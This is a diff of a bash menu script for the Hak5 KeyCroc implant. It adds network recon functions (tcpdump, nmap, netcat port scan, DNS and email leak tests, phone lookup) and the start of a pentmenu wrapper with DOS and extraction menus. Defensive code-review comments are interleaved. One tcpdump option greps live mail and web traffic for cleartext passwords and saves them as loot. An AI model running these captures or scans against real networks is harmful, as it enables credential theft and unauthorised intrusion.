$C" +fi +if [[ $E = "summary" ]]; then + echo "$C [...]" +fi +if [[ $E = "name" ]]; then + echo " $C" +fi +if [[ $E = "email" ]]; then + echo " $C" +fi +done ;; +[nN] | [nN][oO]) + echo -ne "\n$(ColorYellow 'Maybe next time')\n" ;; +*) + invalid_entry ; croc_mail ;; +esac +fi +## +#----Mail keep/remove existing e-mail +## read_all USE EXISTING E-MAIL CREDENTIALS Y/N AND PRESS [ENTER] case $r_a in [yY] | [yY][eE][sS]) @@ -396,7 +523,7 @@ case $r_a in invalid_entry ; croc_mail ;; esac else - echo -ne "\n${LINE_}\e[5m$(ColorRed 'NO EXISTING E-MAIL CREDENTIALS WERE FOUND PLEASE ENTER E-MAIL CREDENTIALS')${LINE_}\n\n" + echo -ne "\n\e[5m$(ColorRed 'NO EXISTING E-MAIL CREDENTIALS WERE FOUND PLEASE ENTER E-MAIL CREDENTIALS')\n\n" user_smtp user_email_set fi @@ -408,10 +535,10 @@ case $r_a in [yY] | [yY][eE][sS]) unset MY_MESS_A unset DEF_MESS - read_all ENTER MESSAGE AND PRESS [ENTER] ;; + read_all ENTER MESSAGE AND PRESS [ENTER] ; MY_MESS_A=${r_a} ;; [nN] | [nN][oO]) unset r_a - local DEF_MESS=$(perl -e 'print "KEYCROC-HAK5---DEVELOPED BY SPYWILL ---Croc_Mail"') + local DEF_MESS=$(perl -e 'print "KEYCROC-HAK5---DEVELOPED BY SPYWILL---Croc_Mail"') local MY_MESS_A=${DEF_MESS} ;; *) invalid_entry ; croc_mail ;; @@ -419,7 +546,7 @@ esac ## #----Mail add attachment to email ## -echo -ne "${blue}ADD ATTACHMENT Y/N AND PRESS [ENTER]:${clear}"; read a_f + read_all ADD ATTACHMENT Y/N AND PRESS [ENTER] ; a_f=${r_a} case $a_f in [yY] | [yY][eE][sS]) mail_file ;; 
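Review bot: The inbox check sends the mail account's user name and password with `--no-check-certificate` and `--secure-protocol=TLSv1`, so the server certificate is never verified and the connection is pinned to an obsolete protocol version; any host on the path can present its own certificate and read the credentials. Remove both options. `--user=$USER --password=$PASS` also puts the password on the command line, where it shows up in the process list, and the command is assembled with `echo` in backticks and then run unquoted, so a password containing a space or glob character is split. Build it as an array, `local -a check_inbox=(wget -T 3 -t 1 -q --user="$mail_user" --password="$mail_pass" -O - https://mail.google.com/mail/feed/atom)`, run it as `"${check_inbox[@]}"`, and prefer a netrc file over `--password`. The rename matters because `local USER=` shadows the shell's `USER` variable for everything called from this function.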
@@ -436,55 +563,52 @@ main_menu #----Croc pot plus menu/function ## function croc_pot_plus() { - LED B - croc_title ## #----Recon scan menu/Function ## -croc_recon() { - echo -ne "$(Info_Screen 'Perform some basic recon scan')\n" +function croc_recon() { + echo -ne "$(Info_Screen ' +-Perform some basic recon scan')\n" ## #----Recon Tcpdump Menu/Function ## tcpdump_scan() { - local LOOT_TCPDUMP=/root/udisk/loot/Croc_Pot/tcpdump.pcap - rm ${LOOT_TCPDUMP} - echo -ne "$(Info_Screen '-Start some basic Tcpdump scan and save to Loot/Croc_Pot folder + local LOOT_TCPDUMP=/root/udisk/loot/Croc_Pot/tcpdump.txt + echo -ne "$(Info_Screen ' +-Start some basic Tcpdump scan and save to Loot/Croc_Pot folder -PRESS CTRL + C TO STOP TCPDUMP SCAN')\n" -MenuTitle TCPDUMP SCAN MENU -MenuColor 1 INTERFACE SCAN ; echo -ne " ${clear}\n" -MenuColor 2 PACKETS IN HEX AND ASCll ; echo -ne " ${clear}\n" -MenuColor 3 PACKETS WITH IP ADDRESS ; echo -ne " ${clear}\n" -MenuColor 4 CURRENT NETWORK INTERFACE ; echo -ne " ${clear}\n" -MenuColor 5 ENTER AN TCPDUMP SCAN ; echo -ne " ${clear}\n" -MenuColor 6 RETURN TO MAIN MENU ; echo -ne " ${clear}\n" -MenuEnd +MenuTitle TCPDUMP SCAN MENU ; MenuColor 25 1 INTERFACE SCAN ; MenuColor 25 2 PACKETS IN HEX AND ASCll ; MenuColor 25 3 PACKETS WITH IP ADDRESS ; MenuColor 25 4 CURRENT NETWORK INTERFACE +MenuColor 25 5 CHECK HOST COMMUNICATION ; MenuColor 25 6 TCP PACKET HTTP REQUEST ; MenuColor 25 7 PACKET OF TCP,UDP,ICMP ; MenuColor 25 8 HOST HEADER HTTP ; MenuColor 25 9 DNS QUERY REQUEST +MenuColor 24 10 ENTER AN TCPDUMP SCAN ; MenuColor 24 11 RETURN TO MAIN MENU ; MenuEnd 28 case $m_a in - 1) tcpdump -D | tee ${LOOT_TCPDUMP} ; tcpdump_scan ;; - 2) tcpdump -XX -i any | tee ${LOOT_TCPDUMP} ; tcpdump_scan ;; - 3) tcpdump -n -i any | tee ${LOOT_TCPDUMP} ; tcpdump_scan ;; - 4) tcpdump | tee ${LOOT_TCPDUMP} ; tcpdump_scan ;; - 5) read_all ENTER TCPDUMP SCAN THEN PRESS [ENTER] && ${r_a} | tee ${LOOT_TCPDUMP} ; tcpdump_scan ;; - 6) main_menu ;; - 0) exit 0 ;; - [bB]) 
croc_recon ;; - *) invalid_entry ; tcpdump_scan ;; + 1) rm ${LOOT_TCPDUMP} 2> /dev/null ; croc_title_loot > ${LOOT_TCPDUMP} ; echo -e "\n\t${LINE_}INTERFACE SCAN${LINE_}\n" >> ${LOOT_TCPDUMP} ; tcpdump -D >> ${LOOT_TCPDUMP} ; cat ${LOOT_TCPDUMP} ; tcpdump_scan ;; + 2) rm ${LOOT_TCPDUMP} 2> /dev/null ; croc_title_loot > ${LOOT_TCPDUMP} ; echo -e "\n\t${LINE_}PACKETS IN HEX AND ASCll${LINE_}\n" >> ${LOOT_TCPDUMP} ; tcpdump -XX -i any >> ${LOOT_TCPDUMP} ; cat ${LOOT_TCPDUMP} ; tcpdump_scan ;; + 3) rm ${LOOT_TCPDUMP} 2> /dev/null ; croc_title_loot > ${LOOT_TCPDUMP} ; echo -e "\n\t${LINE_}PACKETS WITH IP ADDRESS${LINE_}\n" >> ${LOOT_TCPDUMP} ; tcpdump -n -i any >> ${LOOT_TCPDUMP} ; cat ${LOOT_TCPDUMP} ; tcpdump_scan ;; + 4) rm ${LOOT_TCPDUMP} 2> /dev/null ; croc_title_loot > ${LOOT_TCPDUMP} ; echo -e "\n\t${LINE_}CURRENT NETWORK INTERFACE${LINE_}\n" >> ${LOOT_TCPDUMP} ; tcpdump >> ${LOOT_TCPDUMP} ; cat ${LOOT_TCPDUMP} ; tcpdump_scan ;; + 5) rm ${LOOT_TCPDUMP} 2> /dev/null ; croc_title_loot > ${LOOT_TCPDUMP} ; echo -e "\n\t${LINE_}CHECK HOST COMMUNICATION${LINE_}\n" >> ${LOOT_TCPDUMP} ; read_all ENTER IP AND PRESS [ENTER] && tcpdump -i any src host ${r_a} >> ${LOOT_TCPDUMP} ; cat ${LOOT_TCPDUMP} ; tcpdump_scan ;; + 6) rm ${LOOT_TCPDUMP} 2> /dev/null ; croc_title_loot > ${LOOT_TCPDUMP} ; echo -e "\n\t${LINE_}TCP PACKET HTTP REQUEST${LINE_}\n" >> ${LOOT_TCPDUMP} ; tcpdump -i any port http >> ${LOOT_TCPDUMP} & tcpdump -i any port 80 >> ${LOOT_TCPDUMP} & tcpdump -A -s 1492 dst port 80 or -A -s 1492 src port 80 >> ${LOOT_TCPDUMP} & tcpdump -i any port http or port smtp or port imap or port pop3 -l -A | egrep -i 'pass=|pwd=|log=|login=|user=|username=|pw=|passw=|passwd=|password=|pass:|user:|userna me:|password:|login:|pass |user ' >> ${LOOT_TCPDUMP} & tail -f ${LOOT_TCPDUMP} ; tcpdump_scan ;; + 7) rm ${LOOT_TCPDUMP} 2> /dev/null ; croc_title_loot > ${LOOT_TCPDUMP} ; echo -e "\n\t${LINE_}PACKET OF TCP,UDP,ICMP${LINE_}\n" >> ${LOOT_TCPDUMP} ; tcpdump -n -v tcp or udp or icmp 
and not port 22 >> ${LOOT_TCPDUMP} ; cat ${LOOT_TCPDUMP} ; tcpdump_scan ;; + 8) rm ${LOOT_TCPDUMP} 2> /dev/null ; croc_title_loot > ${LOOT_TCPDUMP} ; echo -e "\n\t${LINE_}HOST HEADER HTTP${LINE_}\n" >> ${LOOT_TCPDUMP} ; tcpdump -i any -n -s 0 -w - | grep -a -o -E --line-buffered "GET \/.*|Host\: .*" >> ${LOOT_TCPDUMP} & tail -f ${LOOT_TCPDUMP} && tcpdump_scan ;; + 9) rm ${LOOT_TCPDUMP} 2> /dev/null ; croc_title_loot > ${LOOT_TCPDUMP} ; echo -e "\n\t${LINE_}DNS QUERY REQUEST${LINE_}\n" >> ${LOOT_TCPDUMP} ; tcpdump -i any 'udp port 53' >> ${LOOT_TCPDUMP} ; cat ${LOOT_TCPDUMP} ; tcpdump_scan ;; + 10) rm ${LOOT_TCPDUMP} 2> /dev/null ; croc_title_loot > ${LOOT_TCPDUMP} ; echo -e "\n\t${LINE_}TCPDUMP SCAN${LINE_}\n" >> ${LOOT_TCPDUMP} ; read_all ENTER TCPDUMP SCAN THEN PRESS [ENTER] && ${r_a} >> ${LOOT_TCPDUMP} ; cat ${LOOT_TCPDUMP} ; tcpdump_scan ;; + 11) main_menu ;; 0) exit 0 ;; [bB]) croc_recon ;; *) invalid_entry ; tcpdump_scan ;; esac } ## #----Recon Nmap mean/Function ## -function nmap_menu() { +nmap_menu() { + echo -ne "$(Info_Screen ' +-Start some basic nmap scan and save to Loot/Croc_Pot folder +-Enter IP for scan or default will be target pc ip')\n" local IP_WLAN=$(ifconfig wlan0 | grep "inet addr" | awk {'print $2'} | cut -c 6-) local LOOT_NMAP=/root/udisk/loot/Croc_Pot/KeyCroc_NMAP.txt - echo -ne "$(Info_Screen '-Start some basic nmap scan and save to loot folder --Enter IP for scan or default will be target pc ip')\n\n" ## #----Nmap User IP Input Function ## user_ip_f() { read_all ENTER IP TO USE FOR NMAP SCAN AND PRESS [ENTER] -if [[ "${r_a}" =~ 
^(((25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?))|((([0-9A-Fa-f]{1,4}:){7}([0-9A-Fa-f]{1,4}|:))|(([0-9A-Fa-f]{1,4}:){6}(:[0-9A-Fa-f]{1,4}|((25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)(\.(25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)){3})|:))|(([0-9A-Fa-f]{1,4}:){5}(((:[0-9A-Fa-f]{1,4}){1,2})|:((25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)(\.(25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)){3})|:))|(([0-9A-Fa-f]{1,4}:){4}(((:[0-9A-Fa-f]{1,4}){1,3})|((:[0-9A-Fa-f]{1,4})?:((25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)(\.(25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)){3}))|:))|(([0-9A-Fa-f]{1,4}:){3}(((:[0-9A-Fa-f]{1,4}){1,4})|((:[0-9A-Fa-f]{1,4}){0,2}:((25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)(\.(25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)){3}))|:))|(([0-9A-Fa-f]{1,4}:){2}(((:[0-9A-Fa-f]{1,4}){1,5})|((:[0-9A-Fa-f]{1,4}){0,3}:((25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)(\.(25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)){3}))|:))|(([0-9A-Fa-f]{1,4}:){1}(((:[0-9A-Fa-f]{1,4}){1,6})|((:[0-9A-Fa-f]{1,4}){0,4}:((25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)(\.(25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)){3}))|:))|(:(((:[0-9A-Fa-f]{1,4}){1,7})|((:[0-9A-Fa-f]{1,4}){0,5}:((25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)(\.(25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)){3}))|:))))$ ]]; then +if [[ "${r_a}" =~ ${validate_ip} ]]; then IP_SETUP=${r_a} echo -ne "\t${LINE_}$(ColorGreen 'USING IP THAT WAS ENTER')${r_a}\n" else 
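Review bot: Option 5 passes `${r_a}` straight into `tcpdump -i any src host ${r_a}` without the `validate_ip` check this commit introduces, and option 10 runs whatever was typed as a command (`${r_a} >> ${LOOT_TCPDUMP}`) with the script's privileges, which the `/root` paths suggest is root. Guard option 5 with `[[ "${r_a}" =~ ${validate_ip} ]] || { invalid_entry ; tcpdump_scan ; return ; }` and quote the expansion; for option 10, accept arguments only and call the fixed `tcpdump` binary rather than executing a free-form string. Options 6 and 8 start captures with `&` and never record their PIDs, so they keep running and appending to the loot file after the menu returns; save `$!` and stop them in a `trap`. All ten arms repeat the same `rm … ; croc_title_loot > … ; echo -e …` prefix, which belongs in one helper. `user_ip_f` continues outside this hunk.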
@@ -508,18 +632,8 @@ fi
 #----Nmap Scan Menu
 ##
 LED B
-MenuTitle NMAP MENU
-MenuColor 1 REGULAR SCAN ; echo -ne " ${clear}\n"
-MenuColor 2 QUICK SCAN ; echo -ne " ${clear}\n"
-MenuColor 3 QUICK PLUS ; echo -ne " ${clear}\n"
-MenuColor 4 PING SCAN ; echo -ne " ${clear}\n"
-MenuColor 5 INTENSE SCAN ; echo -ne " ${clear}\n"
-MenuColor 6 INTERFACE SCAN ; echo -ne " ${clear}\n"
-MenuColor 7 PORT SCAN ; echo -ne " ${clear}\n"
-MenuColor 8 PERSONAL SCAN ; echo -ne " ${clear}\n"
-MenuColor 9 TARGET PC SCAN ; echo -ne " ${clear}\n"
-MenuColor 10 RETURN TO MAIN MENU ; echo -ne " ${clear}\n"
-MenuEnd
+MenuTitle NMAP MENU ; MenuColor 20 1 REGULAR SCAN ; MenuColor 20 2 QUICK SCAN ; MenuColor 20 3 QUICK PLUS ; MenuColor 20 4 PING SCAN ; MenuColor 20 5 INTENSE SCAN
+MenuColor 20 6 INTERFACE SCAN ; MenuColor 20 7 PORT SCAN ; MenuColor 20 8 PERSONAL SCAN ; MenuColor 20 9 TARGET PC SCAN ; MenuColor 19 10 RETURN TO MAIN MENU ; MenuEnd 23
 case $m_a in
 1) user_ip_f ; croc_title_loot | tee ${LOOT_NMAP} ; echo -e "\t${LINE_}NMAP REGULAR SCAN${LINE_}\n" | tee -a ${LOOT_NMAP} ; nmap ${IP_WLAN} ${IP_SETUP} | tee -a ${LOOT_NMAP} ; nmap_menu ;;
 2) user_ip_f ; croc_title_loot | tee ${LOOT_NMAP} ; echo -e "\t${LINE_}NMAP QUICK SCAN${LINE_}\n" | tee -a ${LOOT_NMAP} ; nmap -T4 -F ${IP_WLAN} ${IP_SETUP} | tee -a ${LOOT_NMAP} ; nmap_menu ;;
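Review bot: Chaining the whole menu onto two lines with `;` (`MenuTitle NMAP MENU ; MenuColor 20 1 REGULAR SCAN ; …`) turns every future menu change into a diff of the entire line and hides which width belongs to which entry. Keep one `MenuColor` call per line as before and only add the new width argument. The same applies to the menus and `case` arms collapsed in `user_smtp`, `mail_file`, `tcpdump_scan` and the `@@ -529,11 +643,7 @@` hunk. The `case` block that consumes `m_a` continues outside this hunk.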
@@ -529,11 +643,7 @@ MenuEnd
 6) croc_title_loot | tee ${LOOT_NMAP} ; echo -e "\t${LINE_}NMAP INTERFACE SCAN${LINE_}\n" | tee -a ${LOOT_NMAP} ; nmap --iflist | tee -a ${LOOT_NMAP} ; nmap_menu ;;
 7) user_ip_f ; croc_title_loot | tee ${LOOT_NMAP} ; echo -e "\t${LINE_}NMAP PORT SCAN${LINE_}\n" | tee -a ${LOOT_NMAP} ; nmap --top-ports 20 ${IP_WLAN} ${IP_SETUP} | tee -a ${LOOT_NMAP} ; nmap_menu ;;
 8) croc_title_loot | tee ${LOOT_NMAP} ; echo -e "\t${LINE_}NMAP PERSONAL SCAN${LINE_}\n" ; read_all ENTER PERSONAL NMAP SCAN SETTING THEN PRESS [ENTER] && ${r_a} | tee -a ${LOOT_NMAP} ; nmap_menu ;;
- 9) pc_scan ; nmap_menu ;;
- 10) main_menu ;;
- 0) exit 0 ;;
- [bB]) croc_recon ;;
- *) invalid_entry ; nmap_menu ;;
+ 9) pc_scan ; nmap_menu ;; 10) main_menu ;; 0) exit 0 ;; [bB]) croc_recon ;; *) invalid_entry ; nmap_menu ;;
 esac
 }
 ##
@@ -549,7 +659,7 @@ scan_all() {
 echo -ne "\n$(ColorYellow 'Maybe next time')\n"
 croc_recon ;;
 *)
- invalid_entry ; ${@::1} ;;
+ invalid_entry ; ${1} ;;
 esac
 }
 ##
@@ -557,7 +667,8 @@ esac
 ##
 traceroute_scan() {
 clear
- echo -ne "$(Info_Screen 'Traceroute scan enter IP or web site name')\n\n"
+ echo -ne "$(Info_Screen '
+-Traceroute scan enter IP or web site name')\n\n"
 scan_all traceroute_scan traceroute
 }
 ##
@@ -565,7 +676,8 @@ traceroute_scan() {
 ##
 whois_scan() {
 clear
- echo -ne "$(Info_Screen 'Whois Lookup scan enter IP or web site name')\n\n"
+ echo -ne "$(Info_Screen '
+-Whois Lookup scan enter IP or web site name')\n\n"
 install_package whois WHOIS whois_scan croc_recon
 scan_all whois_scan whois
 }
@@ -574,7 +686,8 @@ whois_scan() {
 ##
 dns_scan() {
 clear
- echo -ne "$(Info_Screen 'DNS Lookup scan enter IP or web site name')\n\n"
+ echo -ne "$(Info_Screen '
+-DNS Lookup scan enter IP or web site name')\n\n"
 install_package dnsutils DNSUTILS dns_scan croc_recon
 scan_all dns_scan dig
 }
@@ -583,32 +696,35 @@ dns_scan() { ## target_ping() { clear - echo -ne "$(Info_Screen 'Ping scan enter IP or web site name')\n\n" - scan_all target_ping ping -c 5 -w 5 + echo -ne "$(Info_Screen ' +-Ping scan enter IP or web site name')\n\n" + scan_all target_ping ping -q -c 5 -w 5 } ## #----Recon Port scan with Netcat Function ## target_port() { clear - echo -ne "$(Info_Screen '-Port scan with Netcat enter IP or web site name + echo -ne "$(Info_Screen ' +-Port scan with Netcat enter IP or web site name -Port range will start at port 1 enter port range to stop -Click Ctrl+C to stop script')\n\n" read_all START SCAN Y/N AND PRESS [ENTER] case $r_a in [yY] | [yY][eE][sS]) - read_all ENTER IP OR WEB SITE NAME AND PRESS [ENTER] - echo -ne "${blue}ENTER PORT RANGE FOR SCAN AND PRESS [ENTER]:${clear}"; read range_port - broken=0 + read_all ENTER IP OR WEB SITE NAME AND PRESS [ENTER] ; n_ip=${r_a} + read_all ENTER PORT RANGE FOR SCAN AND PRESS [ENTER] ; range_port=${r_a} + local broken=0 break_script() { - broken=1 + local broken=1 } trap break_script SIGINT for (( PORT = 1; PORT < $range_port; ++PORT )); do - nc -z -w 1 "$r_a" "$PORT" < /dev/null; + nc -z -w 1 "$n_ip" "$PORT" < /dev/null; if [ $? -eq 0 ]; then echo -ne "${green}Open port $PORT${clear}\n" -elif [ $broken -eq 1 ]; then break +elif [ $broken -eq 1 ]; then + break fi done ;; [nN] | [nN][oO]) 
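Review bot: Changing the handler body to `local broken=1` means Ctrl+C no longer stops the scan: `local` inside `break_script` creates a new variable that disappears when the handler returns, so the `broken` declared in `target_port` stays `0` and `elif [ $broken -eq 1 ]` never fires. Keep `local broken=0` in `target_port` but write plain `broken=1` in `break_script`, and restore the default with `trap - SIGINT` after the loop. `range_port` is also used in `(( PORT < $range_port ))` without a check; arithmetic evaluation expands names and subscripts, so require digits first with `[[ $range_port =~ ^[0-9]+$ ]] || { invalid_entry ; target_port ; return ; }`. The `case` statement continues outside this hunk.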
@@ -623,46 +739,1219 @@ esac ## ssl_scan() { clear - echo -ne "$(Info_Screen 'Scanning TLS/SSL configuration with SSLscan --SSLscan is a command-line tool example: sslscan googel.com:443')\n\n" + echo -ne "$(Info_Screen ' +-Scanning TLS/SSL configuration with SSLscan +-SSLscan is a command-line tool example: sslscan google.com:443')\n\n" install_package sslscan SSLSCAN ssl_scan croc_recon scan_all ssl_scan sslscan --no-failed } ## +#----Recon phone number lookup +## +phone_lookup() { + echo -ne "$(Info_Screen ' +-Phone number lookup 555-555-5555 +-curl https://www.phonelookup.com')\n\n" + local userAgentList=( +"Mozilla/5.0 (iPhone; CPU iPhone OS 12_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0 Mobile/15E148 Safari/604.1" +"Mozilla/5.0 (Linux; Android 8.0.0; SM-G960F Build/R16NW) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.84 Mobile Safari/537.36" +"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246" +"Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.86 Safari/533.4" +"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3" +"Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" +"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16" +"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152;" +"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)" +"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.17) Gecko/20061201 Firefox/2.0.0.17 (Ubuntu-feisty)" +"Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Mobile/7B367" +"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" +"Mozilla/4.0 (compatible; 
MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR" +"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4" +"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR" +"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 1.1.4322; InfoPat" +"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.86 Safari/533.4" +) +local userAgent="${userAgentList[ $(expr $RANDOM \% ${#userAgentList[*]}) ]}" +read_all ENTER PHONE NUMBER TO LOOKUP AND PRESS [ENTER] +curl -sk https://www.phonelookup.com/1/${r_a} -A "$userAgent" | grep -e "h[14]" | head -n14 | sed -e "s/^\s*//" -e "s/\s*$//" -e "s/<[^>]*>//g" | sed '1c\ ' #-e "s/^.*:\s//" +} +## +#----Recon check dns leak test +## +leak_dns() { + echo -ne "$(Info_Screen ' +-DNS leak tests +-BY https://bash.ws/')\n\n" +local api_domain='bash.ws' +local error_code=1 +increment_error_code() { + error_code=$((error_code + 1)) +} +echo_bold() { + echo -e "${yellow}${1}${clear}" +} +echo_error() { + (>&2 echo -e "${red}${1}${clear}") +} +program_exit() { + command -v $1 > /dev/null +if [ $? -ne 0 ]; then + echo_error "Please, install \"$1\"" + $error_code +fi + increment_error_code +} +check_internet_connection() { + curl -k --silent --head --request GET "https://${api_domain}" | grep "200 OK" > /dev/null +if [ $? -ne 0 ]; then + echo_error "No internet connection." 
+ $error_code +fi + increment_error_code +} +program_exit curl +program_exit ping +check_internet_connection +if command -v jq &> /dev/null; then + jq_exists=1 +else + jq_exists=0 +fi +if hash shuf 2>/dev/null; then + id=$(shuf -i 1000000-9999999 -n 1) +else + id=$(jot -w %i -r 1 1000000 9999999) +fi +for i in $(seq 1 10); do + ping -c 1 "${i}.${id}.${api_domain}" > /dev/null 2>&1 +done +print_servers() { +if (( $jq_exists )); then + echo ${result_json} | \ + jq --monochrome-output \ + --raw-output \ + ".[] | select(.type == \"${1}\") | \"\(.ip)\(if .country_name != \"\" and .country_name != false then \" [\(.country_name)\(if .asn != \"\" and .asn != false then \" \(.asn)\" else \"\" end)]\" else \"\" end)\"" +else + while IFS= read -r line; do + if [[ "$line" != *${1} ]]; then + continue + fi + ip=$(echo $line | cut -d'|' -f 1) + code=$(echo $line | cut -d'|' -f 2) + country=$(echo $line | cut -d'|' -f 3) + asn=$(echo $line | cut -d'|' -f 4) + if [ -z "${ip// }" ]; then + continue + fi + if [ -z "${country// }" ]; then + echo "$ip" + else + if [ -z "${asn// }" ]; then + echo "$ip [$country]" + else + echo "$ip [$country, $asn]" + fi + fi + done <<< "$result_txt" +fi +} +if (( $jq_exists )); then + result_json=$(curl -k --silent "https://${api_domain}/dnsleak/test/${id}?json") +else + result_txt=$(curl -k --silent "https://${api_domain}/dnsleak/test/${id}?txt") +fi +dns_count=$(print_servers "dns" | wc -l) +echo_bold "Your IP:" +print_servers "ip" +echo "" +if [ ${dns_count} -eq "0" ];then + echo_bold "No DNS servers found" +else +if [ ${dns_count} -eq "1" ];then + echo_bold "You use ${dns_count} DNS server:" +else + echo_bold "You use ${dns_count} DNS servers:" +fi + print_servers "dns" +fi +echo "" +echo_bold "Conclusion:" +print_servers "conclusion" +} +## +#----Recon check e-mail leak test +## +email_leak() { + echo -ne "$(Info_Screen ' +-Check e-mail if leaked +-BY https://bash.ws/')\n\n" +local api_domain='bash.ws' +local error_code=1 +increment_error_code() 
{ + error_code=$((error_code + 1)) +} +echo_bold() { + echo -e "${yellow}${1}${clear}" +} +echo_error() { + (>&2 echo -e "${red}${1}${clear}") +} +program_exit() { + command -v $1 > /dev/null +if [ $? -ne 0 ]; then + echo_error "Please, install \"$1\"" + $error_code +fi + increment_error_code +} +check_internet_connection() { + curl -k --silent --head --request GET "https://${api_domain}" | grep "200 OK" > /dev/null +if [ $? -ne 0 ]; then + echo_error "No internet connection." + $error_code +fi + increment_error_code +} +print_servers() { +if (( $jq_exists )); then + echo ${result} | \ + jq --monochrome-output \ + --raw-output \ + ".[] | select(.type == \"${1}\") | \"\(.ip)\(if .country_name != \"\" and .country_name != false then \" [\(.country_name)\(if .asn != \"\" and .asn != false then \" \(.asn)\" else \"\" end)]\" else \"\" end)\"" +else + while IFS= read -r line; do + if [[ "$line" != *${1} ]]; then + continue + fi + ip=$(echo $line | cut -d'|' -f 1) + code=$(echo $line | cut -d'|' -f 2) + country=$(echo $line | cut -d'|' -f 3) + asn=$(echo $line | cut -d'|' -f 4) + if [ -z "${ip// }" ]; then + continue + fi + if [ -z "${country// }" ]; then + echo "$ip" + else + if [ -z "${asn// }" ]; then + echo "$ip [$country]" + else + echo "$ip [$country, $asn]" + fi + fi + done <<< "$result" +fi +} +program_exit curl +program_exit ping +program_exit mail +check_internet_connection +if command -v jq &> /dev/null; then + jq_exists=1 +else + jq_exists=0 +fi +if hash shuf 2>/dev/null; then + id=$(shuf -i 1000000-9999999 -n 1) +else + id=$(jot -w %i -r 1 1000000 9999999) +fi +if (( $jq_exists )); then + format="json" +else + format="txt" +fi +result=$(curl -k --silent "https://${api_domain}/email-leak-test/test/${id}?${format}") +mail -s "Test" ${id}@bash.ws < /dev/null > /dev/null +for (( ; ; )) +do + result=$(curl -k --silent "https://${api_domain}/email-leak-test/test/${id}?${format}") + is_done=$(print_servers "done") +if [[ $is_done == *"1"* ]]; then + break +fi +done 
+echo_bold "Your IP:" +print_servers "ip" +echo "" +ips_count=$(print_servers "mail" | wc -l) +if [ ${ips_count} -eq "0" ];then + echo_bold "No IPs found in mail header" +else +if [ ${ips_count} -eq "1" ];then + echo_bold "Mail header has got ${ips_count} IP:" +else + echo_bold "Mail header has got ${ips_count} IPs:" +fi + print_servers "mail" +fi +echo "" +echo_bold "Conclusion:" +print_servers "conclusion" +} +## +#----Recon pentmenu github by Chris Spillane +## +pentmenu() { + echo -ne "$(Info_Screen ' +-Welcome to pentmenu! +-This software is only for responsible, authorised use. +-YOU are responsible for your own actions! +-Readme:https://raw.githubusercontent.com/GinjaChris/pentmenu/master/README.md +-Big thanks to Chris Spillane - GinjaChris +-Requirements:bash, curl, netcat, hping3 or nping, openssl, stunnel, +-nmap, whois, dnsutils, ike-scan')\n\n" +install_package whois WHOIS pentmenu +install_package host HOST pentmenu +install_package hping3 HPING3 pentmenu +install_package dnsutils DNSUTILS pentmenu +#install_package stunnel STUNNEL pentmenu +install_package ike-scan IKE-SCAN pentmenu +## +#----pentmenu main menu +## +mainmenu() { +MenuTitle PENTMENU MAIN MENU ; MenuColor 20 1 RECON MENU ; MenuColor 20 2 DOS MENU ; MenuColor 20 3 EXTRACTION MENU ; MenuColor 20 4 VIEW README ; MenuColor 20 5 RETURN TO MAIN MENU ; MenuEnd 23 + case $m_a in + 1) reconmenu ;; 2) dosmenu ;; 3) extractionmenu ;; 4) showreadme ;; 5) main_menu ;; 0) exit 0 ;; [bB]) croc_recon ;; *) invalid_entry ; mainmenu ;; + esac +} +## +#----Recon menu +## +reconmenu() { +MenuTitle RECON SCAN MENU ; MenuColor 20 1 SHOW IP ; MenuColor 20 2 DNS RECON ; MenuColor 20 3 PING SWEEP ; MenuColor 20 4 QUICK SCAN ; MenuColor 20 5 DETAILED SCAN +MenuColor 20 6 UDP SCAN ; MenuColor 20 7 CHECK SERVER UPTIME ; 